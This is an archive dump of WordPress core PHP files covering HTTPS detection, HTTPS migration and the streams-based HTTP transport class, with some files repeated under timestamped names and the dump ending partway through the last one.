* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605140629.php 0000666 00000011205 15224151220 0011773 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605034026-20260621081121.php 0000666 00000013341 15224151220 0013331 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-http-streams-20260621123208.php 0000666 00000040733 15224151220 0013024 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Streams class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to integrate PHP Streams as an HTTP transport.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`.
* @deprecated 6.4.0 Use WP_Http
* @see WP_Http
*/
#[AllowDynamicProperties]
class WP_Http_Streams {
/**
* Send a HTTP request to a URI using PHP Streams.
*
* @see WP_Http::request() For default options descriptions.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param string $url The request URL.
* @param string|array $args Optional. Override the defaults.
* @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error
*/
public function request( $url, $args = array() ) {
$defaults = array(
'method' => 'GET',
'timeout' => 5,
'redirection' => 5,
'httpversion' => '1.0',
'blocking' => true,
'headers' => array(),
'body' => null,
'cookies' => array(),
'decompress' => false,
'stream' => false,
'filename' => null,
);
$parsed_args = wp_parse_args( $args, $defaults );
if ( isset( $parsed_args['headers']['User-Agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['User-Agent'];
unset( $parsed_args['headers']['User-Agent'] );
} elseif ( isset( $parsed_args['headers']['user-agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['user-agent'];
unset( $parsed_args['headers']['user-agent'] );
}
// Construct Cookie: header if any cookies are set.
WP_Http::buildCookieHeader( $parsed_args );
$parsed_url = parse_url( $url );
$connect_host = $parsed_url['host'];
$secure_transport = ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] );
if ( ! isset( $parsed_url['port'] ) ) {
if ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] ) {
$parsed_url['port'] = 443;
$secure_transport = true;
} else {
$parsed_url['port'] = 80;
}
}
// Always pass a path, defaulting to the root in cases such as http://example.com.
if ( ! isset( $parsed_url['path'] ) ) {
$parsed_url['path'] = '/';
}
if ( isset( $parsed_args['headers']['Host'] ) || isset( $parsed_args['headers']['host'] ) ) {
if ( isset( $parsed_args['headers']['Host'] ) ) {
$parsed_url['host'] = $parsed_args['headers']['Host'];
} else {
$parsed_url['host'] = $parsed_args['headers']['host'];
}
unset( $parsed_args['headers']['Host'], $parsed_args['headers']['host'] );
}
/*
* Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect
* to ::1, which fails when the server is not set up for it. For compatibility, always
* connect to the IPv4 address.
*/
if ( 'localhost' === strtolower( $connect_host ) ) {
$connect_host = '127.0.0.1';
}
$connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host;
$is_local = isset( $parsed_args['local'] ) && $parsed_args['local'];
$ssl_verify = isset( $parsed_args['sslverify'] ) && $parsed_args['sslverify'];
if ( $is_local ) {
/**
* Filters whether SSL should be verified for local HTTP API requests.
*
* @since 2.8.0
* @since 5.1.0 The `$url` parameter was added.
*
* @param bool|string $ssl_verify Boolean to control whether to verify the SSL connection
* or path to an SSL certificate.
* @param string $url The request URL.
*/
$ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify, $url );
} elseif ( ! $is_local ) {
/** This filter is documented in wp-includes/class-wp-http.php */
$ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify, $url );
}
$proxy = new WP_HTTP_Proxy();
$context = stream_context_create(
array(
'ssl' => array(
'verify_peer' => $ssl_verify,
// 'CN_match' => $parsed_url['host'], // This is handled by self::verify_ssl_certificate().
'capture_peer_cert' => $ssl_verify,
'SNI_enabled' => true,
'cafile' => $parsed_args['sslcertificates'],
'allow_self_signed' => ! $ssl_verify,
),
)
);
$timeout = (int) floor( $parsed_args['timeout'] );
$utimeout = 0;
if ( $timeout !== (int) $parsed_args['timeout'] ) {
$utimeout = 1000000 * $parsed_args['timeout'] % 1000000;
}
$connect_timeout = max( $timeout, 1 );
// Store error number.
$connection_error = null;
// Store error string.
$connection_error_str = null;
if ( ! WP_DEBUG ) {
// In the event that the SSL connection fails, silence the many PHP warnings.
if ( $secure_transport ) {
$error_reporting = error_reporting( 0 );
}
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
if ( $secure_transport ) {
error_reporting( $error_reporting );
}
} else {
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
$handle = stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
$handle = stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
}
if ( false === $handle ) {
// SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken.
if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
return new WP_Error( 'http_request_failed', $connection_error . ': ' . $connection_error_str );
}
// Verify that the SSL certificate is valid for this request.
if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) {
if ( ! self::verify_ssl_certificate( $handle, $parsed_url['host'] ) ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
}
stream_set_timeout( $handle, $timeout, $utimeout );
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { // Some proxies require full URL in this field.
$request_path = $url;
} else {
$request_path = $parsed_url['path'] . ( isset( $parsed_url['query'] ) ? '?' . $parsed_url['query'] : '' );
}
$headers = strtoupper( $parsed_args['method'] ) . ' ' . $request_path . ' HTTP/' . $parsed_args['httpversion'] . "\r\n";
$include_port_in_host_header = (
( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) )
|| ( 'http' === $parsed_url['scheme'] && 80 !== $parsed_url['port'] )
|| ( 'https' === $parsed_url['scheme'] && 443 !== $parsed_url['port'] )
);
if ( $include_port_in_host_header ) {
$headers .= 'Host: ' . $parsed_url['host'] . ':' . $parsed_url['port'] . "\r\n";
} else {
$headers .= 'Host: ' . $parsed_url['host'] . "\r\n";
}
if ( isset( $parsed_args['user-agent'] ) ) {
$headers .= 'User-agent: ' . $parsed_args['user-agent'] . "\r\n";
}
if ( is_array( $parsed_args['headers'] ) ) {
foreach ( (array) $parsed_args['headers'] as $header => $header_value ) {
$headers .= $header . ': ' . $header_value . "\r\n";
}
} else {
$headers .= $parsed_args['headers'];
}
if ( $proxy->use_authentication() ) {
$headers .= $proxy->authentication_header() . "\r\n";
}
$headers .= "\r\n";
if ( ! is_null( $parsed_args['body'] ) ) {
$headers .= $parsed_args['body'];
}
fwrite( $handle, $headers );
if ( ! $parsed_args['blocking'] ) {
stream_set_blocking( $handle, 0 );
fclose( $handle );
return array(
'headers' => array(),
'body' => '',
'response' => array(
'code' => false,
'message' => false,
),
'cookies' => array(),
);
}
$response = '';
$body_started = false;
$keep_reading = true;
$block_size = 4096;
if ( isset( $parsed_args['limit_response_size'] ) ) {
$block_size = min( $block_size, $parsed_args['limit_response_size'] );
}
// If streaming to a file setup the file handle.
if ( $parsed_args['stream'] ) {
if ( ! WP_DEBUG ) {
$stream_handle = @fopen( $parsed_args['filename'], 'w+' );
} else {
$stream_handle = fopen( $parsed_args['filename'], 'w+' );
}
if ( ! $stream_handle ) {
return new WP_Error(
'http_request_failed',
sprintf(
/* translators: 1: fopen(), 2: File name. */
__( 'Could not open handle for %1$s to %2$s.' ),
'fopen()',
$parsed_args['filename']
)
);
}
$bytes_written = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
if ( ! $body_started ) {
$response .= $block;
if ( strpos( $response, "\r\n\r\n" ) ) {
$processed_response = WP_Http::processResponse( $response );
$body_started = true;
$block = $processed_response['body'];
unset( $response );
$processed_response['body'] = '';
}
}
$this_block_size = strlen( $block );
if ( isset( $parsed_args['limit_response_size'] )
&& ( $bytes_written + $this_block_size ) > $parsed_args['limit_response_size']
) {
$this_block_size = ( $parsed_args['limit_response_size'] - $bytes_written );
$block = substr( $block, 0, $this_block_size );
}
$bytes_written_to_file = fwrite( $stream_handle, $block );
if ( $bytes_written_to_file !== $this_block_size ) {
fclose( $handle );
fclose( $stream_handle );
return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) );
}
$bytes_written += $bytes_written_to_file;
$keep_reading = (
! isset( $parsed_args['limit_response_size'] )
|| $bytes_written < $parsed_args['limit_response_size']
);
}
fclose( $stream_handle );
} else {
$header_length = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
$response .= $block;
if ( ! $body_started && strpos( $response, "\r\n\r\n" ) ) {
$header_length = strpos( $response, "\r\n\r\n" ) + 4;
$body_started = true;
}
$keep_reading = (
! $body_started
|| ! isset( $parsed_args['limit_response_size'] )
|| strlen( $response ) < ( $header_length + $parsed_args['limit_response_size'] )
);
}
$processed_response = WP_Http::processResponse( $response );
unset( $response );
}
fclose( $handle );
$processed_headers = WP_Http::processHeaders( $processed_response['headers'], $url );
$response = array(
'headers' => $processed_headers['headers'],
// Not yet processed.
'body' => null,
'response' => $processed_headers['response'],
'cookies' => $processed_headers['cookies'],
'filename' => $parsed_args['filename'],
);
// Handle redirects.
$redirect_response = WP_Http::handle_redirects( $url, $parsed_args, $response );
if ( false !== $redirect_response ) {
return $redirect_response;
}
// If the body was chunk encoded, then decode it.
if ( ! empty( $processed_response['body'] )
&& isset( $processed_headers['headers']['transfer-encoding'] )
&& 'chunked' === $processed_headers['headers']['transfer-encoding']
) {
$processed_response['body'] = WP_Http::chunkTransferDecode( $processed_response['body'] );
}
if ( true === $parsed_args['decompress']
&& true === WP_Http_Encoding::should_decode( $processed_headers['headers'] )
) {
$processed_response['body'] = WP_Http_Encoding::decompress( $processed_response['body'] );
}
if ( isset( $parsed_args['limit_response_size'] )
&& strlen( $processed_response['body'] ) > $parsed_args['limit_response_size']
) {
$processed_response['body'] = substr( $processed_response['body'], 0, $parsed_args['limit_response_size'] );
}
$response['body'] = $processed_response['body'];
return $response;
}
/**
* Verifies the received SSL certificate against its Common Names and subjectAltName fields.
*
* PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if
* the certificate is valid for the hostname which was requested.
* This function verifies the requested hostname against certificate's subjectAltName field,
* if that is empty, or contains no DNS entries, a fallback to the Common Name field is used.
*
* IP Address support is included if the request is being made to an IP address.
*
* @since 3.7.0
*
* @param resource $stream The PHP Stream which the SSL request is being made over
* @param string $host The hostname being requested
* @return bool If the certificate presented in $stream is valid for $host
*/
public static function verify_ssl_certificate( $stream, $host ) {
$context_options = stream_context_get_options( $stream );
if ( empty( $context_options['ssl']['peer_certificate'] ) ) {
return false;
}
$cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] );
if ( ! $cert ) {
return false;
}
/*
* If the request is being made to an IP address, we'll validate against IP fields
* in the cert (if they exist)
*/
$host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' );
$certificate_hostnames = array();
if ( ! empty( $cert['extensions']['subjectAltName'] ) ) {
$match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] );
foreach ( $match_against as $match ) {
list( $match_type, $match_host ) = explode( ':', $match );
if ( strtolower( trim( $match_type ) ) === $host_type ) { // IP: or DNS:
$certificate_hostnames[] = strtolower( trim( $match_host ) );
}
}
} elseif ( ! empty( $cert['subject']['CN'] ) ) {
// Only use the CN when the certificate includes no subjectAltName extension.
$certificate_hostnames[] = strtolower( $cert['subject']['CN'] );
}
// Exact hostname/IP matches.
if ( in_array( strtolower( $host ), $certificate_hostnames, true ) ) {
return true;
}
// IP's can't be wildcards, Stop processing.
if ( 'ip' === $host_type ) {
return false;
}
// Test to see if the domain is at least 2 deep for wildcard support.
if ( substr_count( $host, '.' ) < 2 ) {
return false;
}
// Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com.
$wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host );
return in_array( strtolower( $wildcard_host ), $certificate_hostnames, true );
}
/**
* Determines whether this class can be used for retrieving a URL.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param array $args Optional. Array of request arguments. Default empty array.
* @return bool False means this class can not be used, true means it can.
*/
public static function test( $args = array() ) {
if ( ! function_exists( 'stream_socket_client' ) ) {
return false;
}
$is_ssl = isset( $args['ssl'] ) && $args['ssl'];
if ( $is_ssl ) {
if ( ! extension_loaded( 'openssl' ) ) {
return false;
}
if ( ! function_exists( 'openssl_x509_parse' ) ) {
return false;
}
}
/**
* Filters whether streams can be used as a transport for retrieving a URL.
*
* @since 2.7.0
*
* @param bool $use_class Whether the class can be used. Default true.
* @param array $args Request arguments.
*/
return apply_filters( 'use_streams_transport', true, $args );
}
}
/**
* Deprecated HTTP Transport method which used fsockopen.
*
* This class is not used, and is included for backward compatibility only.
* All code should make use of WP_Http directly through its API.
*
* @see WP_HTTP::request
*
* @since 2.7.0
* @deprecated 3.7.0 Please use WP_HTTP::request() directly
*/
class WP_HTTP_Fsockopen extends WP_Http_Streams {
// For backward compatibility for users who are using the class directly.
}
https-migration-20260605082106-20260621081211-20260621134851.php 0000666 00000011205 15224151220 0014731 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
